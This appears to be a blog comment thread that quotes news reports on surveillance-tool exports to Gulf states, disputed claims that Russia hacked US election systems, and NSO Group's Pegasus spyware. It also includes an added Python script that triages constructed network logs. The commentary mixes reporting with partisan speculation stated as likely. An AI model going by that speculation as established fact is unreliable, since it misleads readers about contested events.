    As protests spread across the Arab world, social media became a key tool for organisers.

    Governments began shopping around for more sophisticated cyber-surveillance systems – opening up a lucrative new market for companies like BAE Systems.

    In 2011, BAE bought ETI and the company became part of BAE Systems Applied Intelligence.

    Over the next five years, BAE used its Danish subsidiary to supply Evident systems to many Middle Eastern countries with questionable human rights records.

    Freedom of information requests submitted by the BBC and the Dagbladet Information newspaper in Denmark revealed exports to Saudi Arabia, the UAE, Qatar, Oman, Morocco and Algeria.

    While it is not possible to link individual cases directly to the Evident system, increased levels of cyber-surveillance since the start of the Arab Spring have had a direct and devastating impact on the activities of human rights and democracy campaigners in many of the states that acquired it.

    “I wouldn’t be exaggerating if I said more than 90% of the most active campaigners in 2011 have now vanished,” says Yahya Assiri, a former Saudi air force officer who fled the country after posting pro-democracy statements online.

    “It used to be that ‘the walls have ears’, but now it’s ‘smartphones have ears’,” says Manal al-Sharif, a Saudi women’s rights activist who also now lives abroad.

    “No country monitors its own people the way they do in the Gulf countries. They have the money, so they can buy advanced surveillance software.”

    The situation has led campaigners to voice deep concerns about the future of civil society in the Middle East.

    “Surveillance will destroy people’s confidence in organising, expressing and sharing ideas, trying to create a political movement,” warns Gus Hosein of London-based Privacy International.

    ‘Responsible trading’

    The BBC has also asked for responses from the governments of Saudi Arabia, Oman and the UAE. It has not yet received any replies.

    All sales of Evident were made entirely legally under Danish government export licences, issued by the Danish Business Authority.

    BAE Systems in the UK declined a BBC request for an interview on the issue, saying it was against company policy to comment on specific contracts. But in a written statement the company said: “BAE systems works for a number of organisations around the world within the regulatory framework of all relevant countries and within our responsible trading principles.”

    During the course of the BBC investigation, it emerged that sales of Evident could also potentially have an impact on national security in the UK.

    An upgraded version of the system now offers another capability – decryption or, to use the technical term, cryptanalysis.

    This enables users to read communications even if they have been securely encrypted.

    Cryptanalysis is such a powerful tool that its export is tightly controlled.

    Export authorisations

    The BBC has obtained a 2015 email exchange between the British and Danish export authorities in which the British side clearly expresses concern about this capability with reference to an Evident sale to the United Arab Emirates.

    “We would refuse a licence to export this cryptanalysis software from the UK because of Criteria 5 concerns,” says the email.

    “Criteria 5” refers to the national security of the UK and its allies.

    The worry is that the software could give users access to the UK’s own communications.

    “Once you’ve sold the equipment to someone they can probably do what they want with it,” says Ross Anderson, professor of Security Engineering at Cambridge University.

    “An Arab country wants to buy cryptanalysis equipment supposedly for its own law enforcement. They have embassies in London, Washington, Paris and Berlin. What’s to stop them putting bulk surveillance equipment in our cities and then using the cryptanalysis equipment to decipher all the mobile phone calls they hear?”

    Despite British objections, the Danish authorities approved the Evident export.

    The Danish foreign ministry declined to be interviewed but in a statement said the Danish Business Authority would not grant export authorisation if an EU member state requested that it did not because of security concerns.

    Defence experts argue that at a time when countries around the world face heightened terrorist threats, there is a clear justification for sales of surveillance equipment.

    “It’s a trade-off,” says Jonathan Shaw, former head of Cyber-Security at the UK Ministry of Defence.

    “I would imagine the consideration that plays in people’s minds is not so much the economic advantage… but it’s that the security of the state we’re talking to is closely linked to ours. Or they are tracking people who are a direct threat to Britain and we need their assistance.”

    According to a 2016 UK Home Office report, mass surveillance technology has played a significant role in every major counter-terrorism investigation in the last decade.

    “The more terrorist incidents there are, the more people will start to see the benefits of favouring security over privacy,” Mr Shaw adds.

    ‘Unacceptable’

    Dutch MEP Marietje Schaake is one of the few European politicians prepared to discuss concerns about surveillance technology exports.

    She says European countries will ultimately pay a price for the compromises now being made.

    “Each and every case where someone is silenced or ends up in prison with the help of EU-made technologies I think is unacceptable,” she told the BBC.

    “I think the fact that these companies are commercial players, developing these highly sophisticated technologies that could have a deep impact on our national security, on people’s lives, requires us to look again at what kind of restrictions may be needed, what kind of transparency and accountability is needed in this market before it turns against our own interest and our own principles.”

    ———-

    “How BAE sold cyber-surveillance tools to Arab states”; BBC; 06/15/2017

    “”You’d be able to intercept any internet traffic,” he said. “If you wanted to do a whole country, you could. You could pin-point people’s location based on cellular data. You could follow people around. They were quite far ahead with voice recognition. They were capable of decrypting stuff as well.””

    That sounds like some pretty advanced hacking capabilities. Advanced hacking capabilities in a lot of government hands:


    As protests spread across the Arab world, social media became a key tool for organisers.

    Governments began shopping around for more sophisticated cyber-surveillance systems – opening up a lucrative new market for companies like BAE Systems.

    In 2011, BAE bought ETI and the company became part of BAE Systems Applied Intelligence.

    Over the next five years, BAE used its Danish subsidiary to supply Evident systems to many Middle Eastern countries with questionable human rights records.

    Freedom of information requests submitted by the BBC and the Dagbladet Information newspaper in Denmark revealed exports to Saudi Arabia, the UAE, Qatar, Oman, Morocco and Algeria.

    And it’s not like these advanced hacking capabilities only work in the Middle East:


    The BBC has obtained a 2015 email exchange between the British and Danish export authorities in which the British side clearly expresses concern about this capability with reference to an Evident sale to the United Arab Emirates.

    “We would refuse a licence to export this cryptanalysis software from the UK because of Criteria 5 concerns,” says the email.

    “Criteria 5” refers to the national security of the UK and its allies.

    The worry is that the software could give users access to the UK’s own communications.

    “Once you’ve sold the equipment to someone they can probably do what they want with it,” says Ross Anderson, professor of Security Engineering at Cambridge University.

    “An Arab country wants to buy cryptanalysis equipment supposedly for its own law enforcement. They have embassies in London, Washington, Paris and Berlin. What’s to stop them putting bulk surveillance equipment in our cities and then using the cryptanalysis equipment to decipher all the mobile phone calls they hear?”

    So when the next big ‘whodunnit?’ hack attack happens and people start assembling a suspect list and asking ‘cui bono?’, don’t forget that BAE already sold these capabilities to a number of the governments across the Middle East.

    Also don’t forget that selling advanced hacking tools to Middle Eastern governments isn’t some BAE monopoly. It’s a competitive market.

    Posted by Pterrafractyl | June 16, 2017, 2:34 pm
  6. You know that report about how the election systems of 39 US states were “hit” by ‘Russian hackers’, most of them just a week before the 2016 November election? Well, the National Association of Secretaries of State, an organization that represents the chief election officials in 40 states, has a rebuttal: They have no idea what this report was talking about and believe it’s a matter of cybersecurity firms being overly aggressive to earn state contracts to protect election systems:

    Benzinga

    State Election Officials Baffled By Report 39 States ‘Hit’ By Russian Hackers

    Mark Fritz , Benzinga Staff Writer
    June 15, 2017 1:16pm

    State election officials are baffled by a Bloomberg report alleging that Russian hackers compromised the voting systems in 39 states, adding that cybersecurity firms were engaging in scare tactics to win state and local contracts to protect election systems.

    The June 13 Bloomberg story said that hackers staged incursions last year into voter databases and software systems in almost twice as many states as previously reported.

    “In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database,” the report said.

    It cited three unnamed sources with direct knowledge of “the U.S. investigation into the matter.”

    “In all, the Russian hackers hit systems in a total of 39 states, one of them said,” the report said.

    The National Security Agency, the FBI and the U.S. Homeland Security Department all are looking into various aspects of what intelligence officials said was Russian meddling into the U.S. election systems.

    Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.

    “We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.”

    Cyber Security Firms Capitalizing On Russian Scare

    She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.

    “There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”

    Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.

    Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”

    Little Doubt Russian Meddling In Election

    Despite the reaction to the Bloomberg report, there is little doubt that Russian actors attempted to access U.S. election systems. Special investigator Robert Mueller has been tasked with spearheading the investigation into whether the Trump campaign colluded with Kremlin affiliates to leak damaging emails and rig the election.

    ———-

    “State Election Officials Baffled By Report 39 States ‘Hit’ By Russian Hackers” by Mark Fritz; Benzinga; 06/15/2017

    ““We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.””

    Yeah, that’s quite a rebuttal. So none of the information from that Bloomberg report can be verified. And the way the spokesperson for the association representing 40 state election chiefs puts it, this report was likely hype created by a cybersecurity industry intent on creating a panic over future Russian hackers for the purpose of basically creating demand for their services:


    Cyber Security Firms Capitalizing On Russian Scare

    She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.

    “There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”

    Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.

    And the Department of Homeland Security downplayed the report too:


    Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”

    That certainly supports the notion that the “39 states were hacked by the Russians” claim was, at a minimum, an exaggeration. And when DHS says the “vast majority” of what they saw was “scanning”, keep in mind that “scanning” computers connected to the internet is ubiquitous, and if they were using IP addresses to attribute this scanning to “Russian hackers”, then, if the US intelligence report on the evidence for ‘Russian hackers’ in the DNC server hack is any indication of the way IP addresses are being used to assess culpability for these state system scanning attempts, IP addresses aren’t the most compelling evidence in this case:

    Counter Punch

    Did the Russians Really Hack the DNC?

    by Gregory Elich
    January 13, 2017

    Russia, we are told, breached the servers of the Democratic National Committee (DNC), swiped emails and other documents, and released them to the public, to alter the outcome of the U.S. presidential election.

    How substantial is the evidence backing these assertions?

    Command-and-control servers remotely issue malicious commands to infected machines. Oddly, for such a key component of the operation, the command-and-control IP address in both attacks was hard-coded in the malware. This seems like another inexplicable choice, given that the point of an advanced persistent threat is to operate for an extended period without detection. A more suitable approach would be to use a Domain Name System (DNS) address, which is a decentralized computer naming system. That would provide a more covert means of identifying the command-and-control server. [13] Moreover, one would expect that address to be encrypted. Using a DNS address would also allow the command-and-control operation to easily move to another server if its location is detected, without the need to modify and reinstall the code.

    One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael. [17]

    “Everyone is focused on attribution, but we may be missing the bigger truth,” says Joshua Corman, Director of the Cyber Statecraft Initiative at the Atlantic Council. “[T]he level of sophistication required to do this hack was so low that nearly anyone could do it.” [18]

    ———-

    “Did the Russians Really Hack the DNC?” by Gregory Elich; Counter Punch; 01/13/2017

    “One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael. [17]

    So were IP addresses of the “scans” of these state election systems the primary evidence used to determine that the Russian government attempted a stunningly brazen last-minute massive hacking operation against US election systems? That’s a question that needs answering now that there’s massive alarm raised over future Russian government hack attacks. Especially now that state election officials refuse to validate any part of that Bloomberg report and suggest it is an instance of cybersecurity industry hype.

    Of course, if the report was true, it’s possible these state election officials are covering their backsides by downplaying the extent to which their defensive measures (or lack thereof) had been breached. It’s something we can’t rule out. But note how the Bloomberg report sources claim that the “digital signatures” collected from the initial Illinois systems hack were distributed to the rest of the states and 39 of them reported finding “traces” of the same hackers. So there’s a significant conflict between the claims of the Bloomberg report’s sources and the stance of the state election chiefs. Also don’t forget that the Bloomberg report was based on three anonymous sources, and only one of them made the claim about 39 states getting hit:

    Bloomberg Politics

    Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known

    by Michael Riley
    and Jordan Robertson
    June 13, 2017, 4:00 AM CDT

    * Attackers said to take measure of voting systems, databases
    * A ‘red phone’ warning to the Kremlin from Obama White House

    Russia’s cyberattack on the U.S. electoral system before Donald Trump’s election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

    In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.

    Illinois Database

    Illinois, which was among the states that gave the FBI and the Department of Homeland Security almost full access to investigate its systems, provides a window into the hackers’ successes and failures.

    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    ———-

    “Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known” by Michael Riley and Jordan Robertson; Bloomberg Politics; 06/13/2017

    “In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.”

    So just one of the three anonymous sources actually made the “39 states were hit” claim and that appeared to be based on the “digital signatures” from the Illinois hack. And the only example signature was IP addresses:


    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    So, all in all, it does look like the claims by state election chiefs that this report was hyped and bogus do have some weight behind them. In which case we just had a high profile and highly provocative claim by someone, presumably from the cybersecurity industry, that is in serious doubt.

    This doesn’t mean that US election systems don’t have serious potential vulnerabilities to hacking. After all, if there’s one thing we’ve learned from all this, it’s that spear-phishing can hit any large organization and it’s not something easily defended against by IT staff because all that’s required is an email that fools one person in an organization.

    But if there is going to be a meaningful attempt to secure US voting systems, it’s probably best that we don’t co-mingle that effort with a massive public relations campaign that portrays Russia as a country that’s aggressively attacking US election systems. Unless, of course, the Russian government did actually order this, in which case we are all in peril because it would imply the Russian government went insane and decided to start provoking the US into a serious future conflict by attacking US election systems in a manner intended to be identified as a Russian government hack. But since the evidence for that case continues to grow weaker with each questionable and/or debunked ‘revelation’ of ‘Russian hacking’, it’s going to be important to recognize that, yes, hackers, even Russian hackers potentially, could threaten US voting systems and they really do need to be better secured, but the Russian government probably isn’t the primary electoral threat Americans need to worry about going forward. After all, blatantly hacking US election systems is something that goes far beyond a Russian media campaign and treads into war territory if the Russian government does it right before the election after getting the “cyber Red Phone” call to stop it. It would be like a psyop designed to inflame tensions to dangerous levels. But for the GOP, messing with electronic voting machines is expected at this point. With no meaningful consequences. Especially now that anyone can just blame the Russians and no one will question the evidence at all apparently.

    Posted by Pterrafractyl | June 17, 2017, 4:12 pm
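    The point this comment keeps returning to, that an IP-address “signature” matched in a state’s logs tells you a host touched the system but not who was behind it, and that most of what DHS reported seeing was scanning rather than intrusion, is easier to see on concrete log data. The following is an added example written for this page, not code from the commenter, Bloomberg, DHS or any of the quoted articles: it parses constructed log lines, labels each source address by what the log actually shows it doing (scanning, failed logins, successful access to a sensitive path, ordinary traffic), and attaches an attribution note that downgrades indicator hits on shared hosting infrastructure. The log lines, hostnames and indicator addresses are constructed from the RFC 5737 documentation ranges, the infrastructure labels and the scan threshold are assumptions, and the one-line log format is invented for the example.

```python
"""
Added example (not from the comment thread or the articles it quotes):
match network-log lines against IP-based indicators and classify the
observed activity, keeping "what happened" separate from "who did it".
All addresses come from the RFC 5737 documentation ranges and all log
lines are constructed sample data, not real indicators or real traffic.
"""
import re
from collections import defaultdict

# Constructed indicator list ("signatures" of the kind the articles
# mention), each with an assumed note on the infrastructure type.
INDICATORS = {
    "203.0.113.7": "shared-hosting VPS",
    "198.51.100.22": "shared-hosting VPS",
    "192.0.2.250": "dedicated host",
}

# Constructed sample log, one event per line (invented format):
# <timestamp> <src_ip> -> <dst_host>:<dst_port> SYN
# <timestamp> <src_ip> -> <dst_host>:<dst_port> HTTP <method> <path> status=<code>
SAMPLE_LOG = """\
2016-10-31T02:10:01Z 203.0.113.7 -> voterdb.example:21 SYN
2016-10-31T02:10:01Z 203.0.113.7 -> voterdb.example:22 SYN
2016-10-31T02:10:01Z 203.0.113.7 -> voterdb.example:23 SYN
2016-10-31T02:10:02Z 203.0.113.7 -> voterdb.example:80 SYN
2016-10-31T02:10:02Z 203.0.113.7 -> voterdb.example:443 SYN
2016-10-31T02:10:02Z 203.0.113.7 -> voterdb.example:3306 SYN
2016-10-31T02:14:33Z 198.51.100.22 -> voterdb.example:443 HTTP POST /admin/login status=401
2016-10-31T02:14:40Z 198.51.100.22 -> voterdb.example:443 HTTP POST /admin/login status=401
2016-10-31T02:15:02Z 198.51.100.22 -> voterdb.example:443 HTTP POST /admin/login status=401
2016-10-31T02:20:00Z 192.0.2.9 -> voterdb.example:443 HTTP GET /index.html status=200
2016-10-31T02:21:17Z 192.0.2.250 -> voterdb.example:443 HTTP GET /export/voters.csv status=200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) -> (?P<dst>[^:\s]+):(?P<port>\d+) "
    r"(?P<event>SYN|HTTP)(?: (?P<method>GET|POST) (?P<path>\S+) status=(?P<status>\d{3}))?$"
)
SENSITIVE_PATH = re.compile(r"^/(export|admin)/")  # assumed sensitive areas
SCAN_PORT_THRESHOLD = 5  # assumed: this many distinct SYN-only ports = a scan


def parse_log(text):
    """Parse the constructed one-line format; lines that don't fit are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["port"] = int(d["port"])
        d["status"] = int(d["status"]) if d["status"] else None
        events.append(d)
    return events


def classify_source(events):
    """Label one source IP by what the log shows it doing, most serious first."""
    syn_ports = {e["port"] for e in events if e["event"] == "SYN"}
    http = [e for e in events if e["event"] == "HTTP"]
    if any(e["status"] == 200 and SENSITIVE_PATH.match(e["path"]) for e in http):
        return "successful access to sensitive path"
    if any(e["method"] == "POST" and e["status"] in (401, 403) for e in http):
        return "failed authentication attempts"
    if len(syn_ports) >= SCAN_PORT_THRESHOLD:
        return "port scanning"
    return "ordinary traffic"


def attribution_note(src):
    """An indicator hit is a lead about infrastructure, not proof of an actor."""
    infra = INDICATORS.get(src)
    if infra is None:
        return "no indicator match"
    if "shared" in infra:
        return "indicator match on shared-hosting address: weak, many actors may use it"
    return "indicator match on dedicated host: a lead, still not proof of who"


def triage(log_text):
    """Per-source report: activity (what happened) beside attribution (who)."""
    by_src = defaultdict(list)
    for e in parse_log(log_text):
        by_src[e["src"]].append(e)
    return {
        src: {
            "activity": classify_source(evs),
            "events": len(evs),
            "indicator_match": src in INDICATORS,
            "attribution": attribution_note(src),
        }
        for src, evs in by_src.items()
    }


if __name__ == "__main__":
    for src, row in triage(SAMPLE_LOG).items():
        print(f"{src:15} {row['events']:2} events  {row['activity']:38} {row['attribution']}")
```

    Run against the constructed log, the report separates the two questions the comment says the Bloomberg story blurred: the scanning host and the failed-login host both match indicators, but both hits land on shared hosting and so say little about the actor, while the one host that actually pulled a sensitive export is the event worth an incident ticket regardless of whether any indicator matched it.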
  7. Well look at that: As investigators explore the more than three dozen companies and individuals that Michael Flynn worked for – as a consultant, adviser, board member, or speaker – while advising the Trump campaign last year, two of those entities are raising some extra eyebrows. Flynn was an advisory board member of Luxembourg-based OSY Technologies and consulted for the US-based private equity firm Francisco Partners. What’s so questionable about these entities? Well, Francisco Partners owns NSO Group – a secretive Israel-based cyberweapons dealer that sells advanced hacking tools to governments around the world – and OSY Technologies is an NSO Group offshoot. Flynn joined OSY in May of last year. Yep, Michael Flynn worked for both the owner of an advanced cyberweapons dealer and one of its offshoots throughout the 2016 campaign:

    The Huffington Post

    Michael Flynn Worked With Foreign Cyberweapons Group That Sold Spyware Used Against Political Dissidents
    While serving as a top campaign adviser to Donald Trump, Flynn worked with firms linked to NSO Group — which develops spyware and sells it to governments.

    By Paul Blumenthal , Jessica Schulberg
    06/19/2017 03:55 pm ET | Updated

    WASHINGTON – While serving as a top campaign aide to Donald Trump, former national security adviser Michael Flynn made tens of thousands of dollars on the side advising a company that sold surveillance technology that repressive governments used to monitor activists and journalists.

    Flynn, who resigned in February after mischaracterizing his conversations with the Russian ambassador to the U.S., has already come under scrutiny for taking money from foreign outfits. Federal investigators began probing Flynn’s lobbying efforts on behalf of a Dutch company led by a businessman with ties to the Turkish government earlier this year. Flynn’s moonlighting wasn’t typical: Most people at the top level of major presidential campaigns do not simultaneously lobby for any entity, especially not foreign governments. It’s also unusual for former U.S. intelligence officials to work with foreign cybersecurity outfits.

    Nor was Flynn’s work with foreign entities while he was advising Trump limited to his Ankara deal. He earned nearly $1.5 million last year as a consultant, adviser, board member, or speaker for more than three dozen companies and individuals, according to financial disclosure forms released earlier this year.

    Two of those entities are directly linked to NSO Group, a secretive Israeli cyberweapons dealer founded by Omri Lavie and Shalev Hulio, who are rumored to have served in Unit 8200, the Israeli equivalent of the National Security Agency.

    Flynn received $40,280 last year as an advisory board member for OSY Technologies, an NSO Group offshoot based in Luxembourg, a favorite tax haven for major corporations. OSY Technologies is part of a corporate structure that runs from Israel, where NSO Group is located, through Luxembourg, the Cayman Islands, the British Virgin Islands, and the U.S.

    Flynn also worked as a consultant last year for Francisco Partners, a U.S.-based private equity firm that owns NSO Group, but he did not disclose how much he was paid. At least two Francisco Partners executives have sat on OSY’s board.

    Flynn’s financial disclosure forms do not specify the work he did for companies linked to NSO Group, and his lawyer did not respond to requests for comment. Former colleagues at Flynn’s consulting firm declined to discuss Flynn’s work with NSO Group. Executives at Francisco Partners who also sit on the OSY Technologies board did not respond to emails. Lavie, the NSO Group co-founder, told HuffPost he is “not interested in speaking to the press” and referred questions to a spokesman, who did not respond to queries.

    Many government and military officials have moved through the revolving door between government agencies and private cybersecurity companies. The major players in the cybersecurity contracting world – SAIC, Booz Allen Hamilton, CACI Federal and KeyW Corporation – all have former top government officials in leadership roles or on their boards, or have former top executives working in government.

    But it’s less common for former U.S. intelligence officials to work with foreign cybersecurity outfits. “There is a lot of opportunity in the U.S. to do this kind of work,” said Ben Johnson, a former NSA employee and the co-founder of Obsidian Security. “It’s a little bit unexpected going overseas, especially when you combine that with the fact that they’re doing things that might end up in hands of enemies of the U.S. government. It does seem questionable.”

    What is clear is that during the time Flynn was working for NSO’s Luxembourg affiliate, one of the company’s main products — a spy software sold exclusively to governments and marketed as a tool for law enforcement officials to monitor suspected criminals and terrorists — was being used to surveil political dissidents, reporters, activists, and government officials. The software, called Pegasus, allowed users to remotely break into a target’s cellular phone if the target responded to a text message.

    Last year, several people targeted by the spyware contacted Citizen Lab, a cybersecurity research team based out of the University of Toronto. With the help of experts at the computer security firm Lookout, Citizen Lab researchers were able to trace the spyware hidden in the texts back to NSO Group spyware. After Citizen Lab publicized its findings, Apple introduced patches to fix the vulnerability. It is not known how many activists in other countries were targeted and failed to report it to experts.

    NSO Group told Forbes in a statement last year that it complies with strict export control laws and only sells to authorized government agencies. “The company does NOT operate any of its systems; it is strictly a technology company,” NSO Group told Forbes.

    But once a sale is complete, foreign governments are free to do what they like with the technology.

    “The government buys [the technology] and can use it however they want,” Bill Marczak, one of the Citizen Lab researchers, told HuffPost. “They’re basically digital arms merchants.”

    The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.

    “When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.

    Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)

    Prominent human rights activists and political dissidents have reported being targeted by NSO’s technology. On August 10, 2016, Ahmed Mansoor, an internationally recognized Emirati human rights activist, received a text message prompting him to click a link to read “new secrets” about detainees abused in UAE prisons. He got a similar text the next day. But Mansoor, who had already been repeatedly targeted by hackers, knew better than to click the links. Instead, he forwarded the messages to Citizen Lab.

    Citizen Lab soon determined that NSO Group’s malware exploited an undisclosed mobile phone vulnerability, known as a zero-day exploit, that enabled its customers – that is, foreign governments – to surveil a target’s phone after the target clicked the link included in the phishing text message. If Mansoor had clicked that link, his “phone would have become a digital spy in his pocket, capable of employing his phone camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements,” Citizen Lab wrote in a report.

    Across the globe in Mexico, where Coca-Cola and PepsiCo were working to repeal a tax on sodas imposed in 2014, two activists and a government-employed scientist, all of whom supported the soda tax, received a series of suspicious text messages. The texts, which became increasingly aggressive and threatening, came as the scientist and the activists were preparing a public relations campaign in support of raising the soda tax and promoting awareness of the health risks linked to sugary beverages.

    Dr. Simón Barquera, researcher at Mexico’s National Institute for Public Health, received a text on July 11, 2016, inviting him to click a link the sender said would lead him to a detailed investigation of his clinic. When Barquera didn’t follow through, the texts escalated. On the 12th, he got a text with a link to a purported court document, which the sender claimed mentioned Barquera by name. On the 13th, yet another text included a link that supposedly contained information about a funeral. The day after that, the sender wrote, “You are an asshole Simon, while you are working I’m fuc king your old lady here is a photo.” The final text Barquera received in August said that his daughter was in “grave condition” after an accident, and included a link that would supposedly tell him where she was being treated.

    Alejandro Calvillo, director of the consumer rights nonprofit El Poder del Consumidor, received a text with a link claiming to be from a man who wanted to know if Calvillo could attend the man’s father’s funeral. Another text sent to Calvillo included a link that the sender said was a viral news story that mentioned him. The final target, Luis Encarnación, a coordinator for the obesity prevention group Coalicion ContraPESO, also received a text with a link claiming that he was named in a news article.

    The targets quickly got in touch with Citizen Lab and forwarded their text messages to the researchers. In February 2017, Citizen Lab released a new report linking NSO Group’s technology to the phishing attempts targeting the pro-soda tax campaigners.

    Citizen Lab researchers have also identified texts sent last summer to Mexican journalist Rafael Cabrera that they believe were an attempt to infect his phone with NSO Group’s Pegasus spyware. Cabrera, who now works for BuzzFeed Mexico, was targeted by hackers after he broke a story revealing a potential conflict of interest with the Mexican first family and a Chinese company.

    Citizen Lab believes NSO Group may have also sold its mobile phone spying technology to many governments, including those of Kenya, Mozambique, Yemen, Qatar, Turkey, Saudi Arabia, Uzbekistan, Thailand, Morocco, Hungary, Nigeria and Bahrain.

    Working with repressive regimes is standard practice in the cyberweapons industry. The Italian surveillance malware firm Hacking Team has worked with dozens of countries known to jail dissidents, according to emails uploaded to WikiLeaks. The FBI and the Drug Enforcement Agency were among the company’s customers, according to the documents.

    Despite recent scrutiny over Mansoor’s case, NSO Group’s value has exploded in recent years. Francisco Partners bought the cyberweapons dealer in 2014 for $120 million. It is now reportedly valued at over $1 billion.

    ———-

    “Michael Flynn Worked With Foreign Cyberweapons Group That Sold Spyware Used Against Political Dissidents” by Paul Blumenthal, Jessica Schulberg; The Huffington Post; 06/19/2017

    “The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.

    Yep, not only was Flynn working for NSO Group’s OSY Technologies and its owners at Francisco Partners, but NSO Group was also initiating plans to get more US government contracts…something that would presumably be much likelier to happen if Donald Trump won the White House and brought Flynn into the government.

    And note how NSO Group wasn’t the only cybersecurity firm Flynn was working for:


    “When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.

    Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)

